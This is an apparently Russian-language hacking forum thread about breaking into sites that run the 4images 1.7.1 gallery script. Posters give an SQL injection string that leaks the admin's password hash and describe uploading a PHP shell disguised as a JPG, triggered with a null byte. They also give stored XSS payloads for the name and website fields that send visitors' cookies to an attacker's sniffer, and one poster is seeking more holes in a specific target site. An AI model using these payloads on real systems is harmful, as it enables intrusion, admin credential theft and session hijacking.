Скрипт 4images 1.7.1 Опасность критическая сайт производителя http://www.4homepages.de/ если в разделе "расширенный поиск" в поле "найти юзера" ввести [Admin nick]' union select user_password from 4images_users where user_name LIKE '[Admin nick] то скрипт в ошибку выдаст зашифрованный мд5хеш админа
вот здесь - http://forum.web-hack.ru/index.php?showtopic=32196 мне попытались немного помочь и указали на несколько дырок, но я о этих дырках знаю и их уже закрыли на интересующем сайте-галерее. может быть кто-то ещё что-то знает?
slime, смотри видео на античате, подробно описано что и как. Заливаешь шел с расширением jpg, при просмотре картинки добавляем символ конца сроки %00, и php скрипт выпоkyится.
активная ХSS в полях имя и сайт. в поле сайт вводим http://"><img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0"> при регистрации вводим имя NAME<img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0"> будет отображатся ваше имя, а остальная часть будет не видна